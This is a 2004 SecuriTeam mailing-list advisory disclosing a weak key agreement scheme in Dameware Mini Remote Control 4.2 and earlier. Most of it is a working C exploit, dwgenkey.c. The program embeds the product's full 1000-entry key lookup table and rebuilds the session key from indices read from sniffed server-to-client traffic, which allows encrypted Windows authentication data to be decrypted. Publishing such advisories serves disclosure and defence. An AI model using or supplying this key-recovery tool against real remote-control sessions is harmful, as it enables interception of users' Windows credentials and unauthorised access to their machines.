[NT] Dameware Mini Remote Control Weak Key Agreement Scheme

• Previous message: SecuriTeam: "[NT] Multiple Vulnerabilites in Aldos Webserver"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 4 May 2004 17:27:15 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Dameware Mini Remote Control Weak Key Agreement Scheme
------------------------------------------------------------------------

SUMMARY

The latest version of Dameware's Mini Remote Control System uses a weak
key agreement scheme. The scheme consists of the sharing of pointers into
a fixed key lookup table. Both the client and the server have access to a
key lookup table (KLT) consisting of 1000 32-bit values.

DETAILS

Vulnerable Systems:
 * Dameware Mini Remote Control version 4.2 and prior

Prior to encrypting traffic the server sends to the client a series of
32-bit integers, call it the key index table (KIT). For the sake of
description lets call the indices klt_idx[4], an array of 4 32-bit
integers. The klt_idx are set as follows:
klt_idx[0] = KIT[100];
klt_idx[1] = KIT[4];
klt_idx[2] = 42;
klt_idx[3] = KIT[37];

The actual session key is then constructed as 4 32-bit integers, sk[4] as
follows.
sk[0] = KLT[klt_idx[0]];
sk[1] = KLT[klt_idx[1]];
sk[2] = KLT[klt_idx[2]];
sk[3] = KLT[klt_idx[3]];

This of course produces 0-bits of security.

They proceed to correct the Electronic Code Book mode of encrypting other
authentication packets using the above constructed key using Blowfish in
cipher block chaining mode with an IV = 0.

Exploit:
/*

 dwgenkey.c dameware generate key program.

     this function mimics the dameware
     key generation algorithm used to
     pass encrypted windows authentication
     across between client and server
   

     ax09001h@hotmail.com

*/

#include <stdio.h>
#include <stdlib.h>

unsigned int KLT [1000] =
{
 0x75A50CF3, 0x58509D61, 0x2352671F, 0x1C8694B4, 0x464A5B8D, 0x17F76F5D,
 0xF7CBFF22, 0xDEE4BBE7, 0x87C577D7, 0x7DE79418, 0x63099A11, 0x7FB4509,
 0xF8AE103C, 0xB8956F47, 0xA788EF1E, 0xBC1B225E, 0x1F6F1B29, 0x48A20FA2,
 0x73764E64, 0x9B1BAFE5, 0xC74859E3, 0xF34C3973, 0xD782E7EB, 0xBC2B83CD,
 0x333141DD, 0x78F91C49, 0x8C3C3C62, 0x430F1CA6, 0xF55CB058, 0x5474C05,
 0x2AD30B5F, 0x47B3AA97, 0xD1DE6ED1, 0x927DD4C0, 0x9043C47A, 0xCFA8D725,
 0x8F2A794B, 0x916758FC, 0x5C21B4C0, 0xAF5D6F28, 0x2E5B2EE9, 0xA4772762,
 0x5C35CBA8, 0x359EE4E1, 0xA778F423, 0xB4EB8D16, 0x846238D7, 0x9B9C7F88,
 0x708517E4, 0x8346D4FA, 0xE131395B, 0xB95282FD, 0x5434DB89, 0x2B00247B,
 0xAB5A14EC, 0x6A74879C, 0x1DF2EDE1, 0x9E9CBAD8, 0x6E4F97D5, 0x8910C7AE,
 0x6C76CD48, 0x4C5C0FDE, 0x1C408E04, 0xB1DC5C7B, 0xB226FFC5, 0x5C1D1096,
 0xA92D865A, 0x48D0FF4C, 0x87F9BF23, 0xF5E864C9, 0x80154A84, 0x38987089,
 0xA4F0EE08, 0x1630ADB9, 0x99F564BD, 0x69394C04, 0xC790C3E5, 0xF0E9E87E,
 0xB9F8AF1C, 0xF797E46C, 0x5F2F339D, 0xB792AB5F, 0x462050F7, 0xF922EDBD,
 0xD8EC238B, 0xDE30DFB6, 0xCAE883E7, 0x77748FED, 0x681AB4C8, 0x1610F821,
 0xAA69288, 0x88E41CCD, 0x81BEA8DB, 0x56236206, 0x3FF596A7, 0x7EB79B23,
 0x2939A1A1, 0x59F56A53, 0x175ACD1D, 0x9D442B3E, 0xCB0D47E3, 0x81BD054E,
 0xC5B5AED3, 0x420BFE41, 0xBA3446BE, 0x1F8AC66A, 0xB12D2A33, 0xD52EB9F3,
 0xFD572127, 0x1ED5C98C, 0x891E0430, 0x263E5AC2, 0xFCEBC8D7, 0x84ACE5F7,
 0x1093FA43, 0xFD07DD1D, 0xC4C91870, 0x1952527F, 0xF77D5A1B, 0xAA6E479B,
 0x26BBC409, 0x1B694B08, 0xAB1246FB, 0x413D0BB5, 0xAC6A46C9, 0x79217008,
 0x315A6C60, 0xA18609FB, 0x37C4221C, 0xD25D2622, 0x6CA0CC6F, 0x6E3A0EDC,
 0x9EA7C082, 0x8F22351D, 0xC58AEC76, 0x8A59BFEF, 0x98C5888F, 0x5EA76365,
 0x7E8B04D1, 0x44B5282D, 0x72547943, 0x6B49B88, 0xD8644EF3, 0x4DCA10BE,
 0x6666892F, 0xAC773084, 0x85A718BE, 0x9C648D4A, 0x3D6787F1, 0xED2DB263,
 0xCB0129DC, 0xAFB919E3, 0x2385872E, 0xE119C18F, 0x8F4ABB22, 0x7A153138,
 0xF4537078, 0x7B535CE4, 0x17E50602, 0x86AF582E, 0xA96A418E, 0x2E464810,
 0xEC0F2BF1, 0xD7500E84, 0xFB8248CB, 0xB6A0934D, 0x45A2F984, 0xDBB687C0,
 0x4FADD405, 0x19E5677B, 0x327DAB10, 0x6E82DD9C, 0x28B99205, 0x627FB642,
 0x13266166, 0xAC1D207E, 0x6757CB08, 0x75A551EE, 0xD8D440C7, 0xF9E198F7,
 0xDCD6C5DD, 0x9E91F814, 0xD411C844, 0x7CD5073B, 0x711214E6, 0x419766DA,
 0xE5209EFB, 0x1A4E0702, 0xD8B6C71, 0xDA3EAE89, 0xA1A00078, 0xB55B5C3E,
 0xE8EB204C, 0x9092BCB5, 0x753F8AA, 0x25DBC9DC, 0x75855E4, 0x5486F63D,
 0xE21C3971, 0x206B068A, 0xAEF41F63, 0xD6C45A84, 0x55CA81BF, 0x245EE02E,
 0x20A277EC, 0x2688325E, 0x5CC597BC, 0xC3C6D5, 0xE10FA336, 0x1E038ED1,
 0xD017BAA1, 0x60F3B322, 0x5C4B7883, 0x37C8827F, 0xA4401AB8, 0x3F0D1244,
 0x599287A9, 0x9FEBF317, 0x551B9574, 0x7B4490D6, 0x5167A51E, 0x75144C86,
 0xB58FA84E, 0xC2EFCD51, 0x62B1B44C, 0xF20CB94C, 0xFB1C3022, 0x5D9FA80E,
 0x9723B02E, 0x9BEB9BC0, 0x7D7D7D7C, 0xBBECAC8, 0xEE7C8FD6, 0x84E7032B,
 0x983051AE, 0x69E077E1, 0x4215FF00, 0x941F1398, 0x899CE29, 0x34FD70CC,
 0x151A4D02, 0x625EFD60, 0xCC9FC987, 0x5854F10C, 0xFDE6B36A, 0xE50E1F0,
 0x7D1AC470, 0x75CF6430, 0x691B188E, 0x861F8385, 0x899781B9, 0x453BBB9,
 0x33CCF322, 0x5BC03054, 0x1C8F4BCE, 0xB20EAD6C, 0x8FC48E15, 0xC650FD0C,
 0x5F9D8872, 0xD100E234, 0xCEBB178A, 0x20F2529F, 0x912889F8, 0x58EDD3F6,
 0x27F8EADA, 0xE501536D, 0xB8635884, 0x5525004, 0x9B6EBF24, 0x4E223C61,
 0x67C61B28, 0xBC8D0315, 0x186A6C99, 0xDAD6D525, 0x1C412AD1, 0x86B268E4,
 0x47B5AC03, 0x72506EEA, 0xCDF419F9, 0x9E062DB4, 0x236F81F7, 0xCF4BFFDF,
 0xF38B27B8, 0x17A2E942, 0xBDF70DFD, 0xB3ED596B, 0xD24583F5, 0x7D25304E,
 0x209350C6, 0xD171038E, 0xA7F746D2, 0x4DD38415, 0x7F7FB4D9, 0x60F193B5,
 0xAF480C11, 0x23E73939, 0x77853419, 0x835D55CE, 0xBCA629D0, 0xCDDA82C9,
 0xC6EC6933, 0xFD779112, 0x3477605F, 0xD56B9610, 0xAAB266A6, 0xF53E8558,
 0x61D7B1D6, 0x5C5ADCD4, 0x9C4C685B, 0x47D4C3FE, 0x956BB743, 0x7BEAB72C,
 0xEE0CADD4, 0x844F5B3D, 0xF6B76242, 0x7A48638E, 0x7A9FCA83, 0x8C5CFCB8,
 0xC5C0200F, 0x458E401B, 0xD0232077, 0x96EC41FB, 0x818E1178, 0xF039C809,
 0xD2CBF2F3, 0xD710BBDF, 0xAF373B6F, 0xECFF5238, 0xA7A90C76, 0xB291F856,
 0x76378535, 0x8AC59C93, 0xCC083868, 0x10B3DCBD, 0x726A72D1, 0xCAA8BABB,
 0x9C519F9B, 0xE57B91C2, 0x3938CA06, 0x8AB0A001, 0x81154FB1, 0xB8B999D9,
 0xB385C69F, 0xF62E1A24, 0xE352A419, 0x52719D67, 0x23D0D6E4, 0xD143E405,
 0x17D114A3, 0x7A590816, 0x4FB4C683, 0x96DE0346, 0x1C96B2B3, 0xE0FE73B,
 0x51FA1A82, 0xB5A325A9, 0x7244452E, 0x88411A62, 0x10F37E47, 0x80E9235D,
 0x8734E043, 0x7287A203, 0x7D322B79, 0x59F16B1A, 0xB715C112, 0x7F930942,
 0xE31AF1D4, 0xC8312072, 0xB949A15E, 0xE5A0942A, 0x21C62B9F, 0x3A8E4A04,
 0xA7B50B0A, 0xC7481BF1, 0xF1E2DB36, 0x8120EAAB, 0x9364D482, 0x481D5B4D,
 0x58460CE7, 0x6E1FE474, 0xCB180DE1, 0xF1FEA961, 0x6E663723, 0x7F713621,
 0xC421154, 0x14B18B19, 0xEB87F422, 0xE2100D60, 0x65ACBC65, 0xC1EA51EA,
 0x9DD0DF6A, 0x9AE68741, 0x1F5DEFA2, 0xA530969B, 0xB746D9D5, 0x1339A116,
 0x7C07054, 0xE118D5CE, 0xF13EE7DA, 0xA53EBE1E, 0x3864BC9, 0x27C3B146,
 0xF2057DFD, 0x5CDF8621, 0x24BBFA19, 0x9C207686, 0xFDA8C0B4, 0x7BC12DE,
 0x3B6E6ABD, 0xEE88CB8E, 0xF11F5F31, 0x17C36F90, 0x62545D14, 0x23BAA683,
 0xBCF05635, 0xEE710A20, 0x88D5C4C1, 0x45D242BC, 0x2618DAFA, 0x71C24008,
 0xEFF1F3E8, 0x90537430, 0xF941923C, 0xE806B643, 0x1E8F4C81, 0x98E93630,
 0x90ECFFE3, 0x422C75E1, 0xA19D77D3, 0x99D16114, 0xCA4380C8, 0xAF2A72E8,
 0x71114704, 0x97EBE3E0, 0x90D614F6, 0xF5408B6D, 0x841EE866, 0x35699601,
 0x9C004E8F, 0x5ACAC96F, 0xF1D181D3, 0xB1DB1F66, 0xAD36B6E6, 0xA3C182A3,
 0x6E159D3A, 0x4860F191, 0xA22499C0, 0xA8DD59AB, 0x5E729975, 0x5285CEC2,
 0xF0505102, 0x87294945, 0x17EE75CA, 0xD5E97597, 0xC36CD9A, 0xA45A497,
 0xA1215DDF, 0x41C84062, 0xC1C6536E, 0xE8AEF5BF, 0xBF109C2E, 0x402A1D1C,
 0x67DEDD8, 0x97061C4A, 0x936BACD0, 0xC34A5C19, 0xF40F90FE, 0xD7B03D1,
 0xD7C91313, 0xE03CF91D, 0x7176F3D4, 0x29440055, 0xBBB3A31C, 0x70F5A3C2,
 0x76E7D2A6, 0x536501F, 0xC77CA12B, 0x5E6E2842, 0x9896F26C, 0x2BC45D27,
 0xE2FF89C7, 0x11FBC8C, 0x252652BD, 0x61AA26A4, 0xF3DF28A, 0xAFB90C39,
 0x3C5BCF12, 0xE765B3A5, 0x6EBF07FE, 0x2630C3A2, 0xC0F995BC, 0x27677058,
 0x49E5FA9C, 0x3B66C518, 0x7654283D, 0xB8305341, 0x72E94CF, 0x3E181088,
 0x9F721122, 0xC536D545, 0x8BD48FE7, 0xA0899C0F, 0x950D4B9C, 0xCDFA8F86,
 0x9D1180B5, 0xB35F2925, 0x85CA36ED, 0x9FA58055, 0xEF0F31F9, 0xA5FADD9C,
 0x2ABB9F51, 0xC90E060A, 0xA0304ED8, 0xB6462678, 0x5ECAB5CB, 0x9BFA4C0C,
 0x1644830E, 0xC210F8D0, 0x3139A59B, 0xDE090D20, 0x89960C79, 0x489E6E7D,
 0xC3650D3F, 0x832E301C, 0x3EC2DEC2, 0x8C1BEFD2, 0x15374CE3, 0xA95682A4,
 0x694B8053, 0x8C003F9E, 0x3C792799, 0xC31B2A4B, 0xFD6F5781, 0x544F000B,
 0x151F60A6, 0x224E32E5, 0x9AD498E6, 0x8B74BFCC, 0x85C8C5DA, 0x221D7990,
 0x66C4A629, 0x1281D60A, 0xE0178028, 0x44E6DEBD, 0xBAAB265, 0x384C4B56,
 0xDC2F9A2C, 0x470211A4, 0xCBD167C3, 0xF5EED383, 0x1E1ED189, 0x29D803F9,
 0xC144F12E, 0x9AC2B5AB, 0xC3DB04A2, 0xC513EB91, 0x71DCF85C, 0x343B65E3,
 0x6B32E419, 0xAFFC770D, 0xBCE86B4D, 0x9AA723E4, 0x611A0E70, 0xFA441603,
 0x3171887D, 0x5AC8ABCD, 0x45A5A2E4, 0xA47AFB05, 0xF1FBA2F1, 0x1F7FA634,
 0x95F72F6A, 0x17E27035, 0xC91082D7, 0x5F2BEE2F, 0x68EE3EA8, 0xD2238F52,
 0xD622F757, 0x2CE5FE15, 0x4DD2E862, 0xD8B78679, 0xA068E1E3, 0x9DA3764,
 0xA46DC043, 0xEF5A319E, 0x3CA47D7, 0x15D66FBD, 0x70FD11C5, 0xEB93FAE7,
 0xE0C76863, 0xCA8DB56B, 0x549B7A6D, 0x7830B60E, 0x63EC6EA1, 0xC5F8C700,
 0x25F6631D, 0x81C74AA6, 0x1FEBAAA6, 0x50FACED0, 0xF3B16C0C, 0x42D24E7D,
 0x87FAB7B4, 0x8998222D, 0xCF13B716, 0xD77799C7, 0xF19B6249, 0xCC56A6E6,
 0x3D87AC7E, 0x2A73259B, 0x5503BDFD, 0xD95F05F1, 0xC01BCD8B, 0x6F9C96E2,
 0x6B2D997, 0xB3F54B81, 0x3139AC71, 0x504DC220, 0x9D4C8848, 0xFAB47FBF,
 0xF910278A, 0x1AAD13D7, 0x667DC201, 0x2A2AE786, 0x845C31FA, 0x27F4E75,
 0x413D1796, 0x9236D7BC, 0x8FAC3425, 0x866DC291, 0x97796BE4, 0x3581CDF,
 0xA313B372, 0x57907BA0, 0x981BE778, 0x67DA3DF6, 0x947D9EC1, 0xCFA65CA6,
 0x6261BF74, 0xD818DCB0, 0x30CBA2D1, 0x1A41B299, 0x33317112, 0x424A6EB6,
 0x516FA0C5, 0x1B0EBEDC, 0xDDAB9664, 0xCBDE0912, 0x8E567CFA, 0xA1C9DAEB,
 0x1C7DB358, 0xA144F1FE, 0x2B7FEE15, 0xB5CA6B77, 0x2B1655B3, 0xFF3D846B,
 0x2B0B907A, 0xC0948E5C, 0x608A1725, 0x2FF6781C, 0x555C1AAC, 0xDB70AD3E,
 0xDFD488CA, 0x2170C025, 0x576C15E7, 0x5F447947, 0x30B8108F, 0xBB9ADE84,
 0x8808C71A, 0xB760EA1F, 0x4E503018, 0x534BA5B5, 0xCDF5FE07, 0xEC48167F,
 0xD1E7227A, 0xCD998A1, 0xE754F192, 0x2727BFFF, 0xBFB0694D, 0xF454B618,
 0x63EBFF6, 0x30BD09D0, 0x927F98B2, 0x6F96ED41, 0xC249BFB1, 0x8E07ED96,
 0x6D3B63AE, 0xC661C79A, 0x574D1947, 0x691AC06A, 0x1241A695, 0xDA814574,
 0xF520C090, 0x7AAFF6DF, 0x6314F55A, 0x99BF992E, 0x4C2350AA, 0x16C970F2,
 0xBC5DAF3D, 0x948FEE79, 0xCF038D84, 0x94916A6F, 0x67C9C446, 0x769D41FC,
 0x7AB8FC6B, 0xAC88CDC6, 0x2632E0F2, 0x7A39D045, 0xE07D60C3, 0x627F0F1B,
 0x6C9E9B6F, 0x5443B96A, 0xB42AEFB6, 0x7D971F39, 0x1E543216, 0xAB1F0A,
 0x4B0E8966, 0xBE389C53, 0xE8143B78, 0x845EEA38, 0x1BC4E0C1, 0xC33854ED,
 0xEBE30DBC, 0xAE0FFAD8, 0x545B28DB, 0x64CB5928, 0x516227C9, 0xDA7DED1B,
 0x60957017, 0xEF42F6C4, 0xD1D44B1A, 0x6E9DCDB0, 0x8089B1C8, 0x78229E35,
 0xE65C19DF, 0xBE4926F8, 0x22F282DB, 0x1DAD0725, 0x1F1E94A5, 0xE1F97ACD,
 0x7EA0006F, 0x94F6FBDD, 0x26214BED, 0xFC7FF0CC, 0xA2393542, 0xB472E61E,
 0x301E470, 0x36FD7EE5, 0xF179CB04, 0x18CC9785, 0x2E0F60B2, 0x13112B9B,
 0x21CE96F9, 0xCF50766C, 0x420F7FBE, 0x3062489, 0xA2E5956D, 0x38AF92C9,
 0x826DB438, 0xCA1D08C7, 0x2CAA1940, 0xCCCDF1C, 0x9C3FE51D, 0x1ECDC7D8,
 0x909C80DE, 0x646BFFA9, 0x6318213D, 0x32C14EFF, 0xC8351460, 0x6D81B09,
 0xC3BA2047, 0x4078D5B1, 0x7AF40C50, 0x7128296, 0xB57DE4BE, 0xBD35598,
 0x2256C607, 0xB6177952, 0xF276EF63, 0x55D787AF, 0x2267BE3B, 0x48B1B069,
 0x5CF704D4, 0x4C1B3376, 0xDF687016, 0x68B38FE2, 0x19E808B4, 0x2FFF302B,
 0x78BD0181, 0xBC4A03F0, 0x98562262, 0xB9797F02, 0x1E7B17D3, 0x61B031D1,
 0x8E69A1F8, 0x32863D7E, 0x8140AA57, 0xD42FB27E, 0x825645B2, 0x7E0AC685,
 0x1752B306, 0xEF07F2F7, 0xF031981C, 0xA061064D, 0xE118F8AB, 0xCCE37EF9,
 0x6AEBFCF7, 0xEEED8568, 0x98A86406, 0x6B7D3AAA, 0xAD068483, 0x2E71AAF2,
 0x1800DB2E, 0xA98F5949, 0xE111A890, 0x17E02EB3, 0xC6B72970, 0x15067E3E,
 0xB2291D61, 0x6008098F, 0xDAD360FF, 0xD19E95D, 0xBEFD0EC7, 0x5F4C9183,
 0xCB5EAB77, 0xC6A1FB76, 0xD71F95D2, 0xFC7FDB6E, 0x80DD91AB, 0x8E322B21,
 0xAAE68069, 0xC2CEB8A5, 0xC89D1CA1, 0x931577D8, 0x4D6F1725, 0xC3E0EC5A,
 0x7F94E8FB, 0x3E008B9C, 0x1DC1680D, 0xF99F3782, 0xFD54CD8F, 0x97722074,
 0xE0F06DB7, 0xF9B44EE8, 0xFBF70D53, 0xDF3B605F, 0xB6CDC64D, 0xD5CC9449,
 0x75A2DC1A, 0x62C4D3AE, 0x6FB02ED3, 0x55F97BF8, 0x86179194, 0x67488E2,
 0x1071C487, 0x5D196F3C, 0x9FCDBA5E, 0x994036B, 0x538C2B87, 0xE3CA84F4,
 0xE6D29642, 0xAA8E0B45, 0xF3557176, 0x403E0041, 0xF1056A7D, 0xB163CC68,
 0xB00F9A47, 0x6E13B87, 0x93C25E4F, 0x4BFCEC42, 0xD4AAE81, 0x9FA016C,
 0x8A842986, 0xDC301A3B, 0xA43D96F1, 0x1DFB9302, 0x4D9F9AAE, 0x6A7416FF,
 0xCF2E7C59, 0x76478C25, 0xAD4A317E, 0x8985000D, 0x38FED22B, 0xFD0944A9,
 0xD2A319D1, 0x9D9ABC55, 0x2A1F76B0, 0x9BCDAA0D, 0x2DE5847, 0xDF44583C,
 0xF4CEBE0F, 0x6733F2CD, 0x5F8A8DA5, 0x4526D975, 0xB6E458B7, 0x4D2BB1A6,
 0x137AA2C6, 0x6DDCFC23, 0xA41CE8B6, 0x4A442E7E, 0xFB7A0A5, 0xF7808F43,
 0x5D10DDD6, 0xA52D6396, 0x61574048, 0x8923CBA2, 0x6436DD12, 0x49266343,
 0xF1787AAB, 0xC467FB1A, 0x25278A4B, 0x2181A43C, 0xC4EAF160, 0x88A9E6BB,
 0xC7AF0933, 0x8002BA84, 0xB134654, 0x4A015A8E, 0xEC16E6AF, 0xEC154BE3,
 0x10FE786A, 0x8F5EA3E7, 0x1A92D7C4, 0xD90FE65A, 0x6CF77EA3, 0x394EB8F9,
 0x573B2AF9, 0xD6396AFA, 0xCC79F56, 0xC36AA7DB, 0x88B6126E, 0x3BBD5F44,
 0xA8086DC7, 0x9437E86F, 0xA8A72E5F, 0x204CC584, 0x508AAC96, 0xEACC6EF1,
 0x981E7A1A, 0xA16DF863, 0xAA9FD0B9, 0x22F6D8DA, 0xA05A7581, 0xD9782911,
 0xCCBDFFD7, 0x7E3C9F4E, 0x96FC6F3D, 0x7113F1FC, 0xD312E7BD, 0x6AD91B0F,
 0x394E21FA, 0x47F135EE, 0xA24E4FE5, 0x2C7A682E, 0x185161A9, 0x6AF00259,
 0xD411424D, 0xB207A9E1, 0xF4E482E7, 0x6173F9FE, 0xE3CEC249, 0xB63D392B,
 0x3FE5BEDF, 0x82C2E736, 0x69FF3BA2, 0x9D219633, 0x8DA0F96F, 0xDFCCCB9,
 0xC4A6A06F, 0xBC536DF7, 0xE76CC1F, 0x452F4BD1, 0x1BC9BA19, 0x4427617C,
 0x4410511D, 0xD2B3643B, 0x90066BE6, 0x9B03705C, 0xF144AE, 0x5017F6E5,
 0x2EC8DA0, 0xC4733AAE, 0xD2CB991D, 0xFF695547, 0xE662D331, 0xA374917C,
 0xB53B62CC, 0xBF135D1, 0x3240CEBA, 0xB406298B, 0x5065FE42, 0x9BB538CC,
 0xC89AF46A, 0x97FB692D, 0xB0123130, 0xED5BFFB1, 0x2CC09D9, 0x68E4E060,
 0xB117D6E7, 0xBA9CE7B3, 0xB731559B, 0x876FF1D
};

int usage()
{
 printf("USAGE: dwkeygen INDEX0 INDEX1 INDEX2\n");
 printf("\t INDEX0 is the hexidecimal value of 101st unsigned int\n");
 printf("\t in the server to client message that preceeds\n");
 printf("\t the encrypted windows authentication packets\n");
 printf("\t INDEX1 is the hexidecimal value of 5th unsigned int\n");
 printf("\t in the server to client message that preceeds\n");
 printf("\t the encrypted windows authentication packets\n");
 printf("\t INDEX2 is the hexidecimal value of 38th unsigned int\n");
 printf("\t in the server to client message that preceeds\n");
 printf("\t the encrypted windows authentication packets\n");
 printf("OUTPUT: dameware encryption key\n");
 return 0;
}

int main(int argc, char **argv)
{
 int i;
 unsigned int sk[4], klt_idx[4];

 if(argc!=4) { return usage(); }
 klt_idx[0] = strtol(argv[1], NULL, 16);
 klt_idx[1] = strtol(argv[2], NULL, 16);
 klt_idx[2] = 42;
 klt_idx[3] = strtol(argv[3], NULL, 16);

 for(i=0;i<4;i++){
  sk[i] = KLT[klt_idx[i]];
  printf("%08X ", sk[i]);
 }
 printf("\n");

 return 0;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:ax09001h@hotmail.com>
ax09001h.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NT] Multiple Vulnerabilites in Aldos Webserver"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]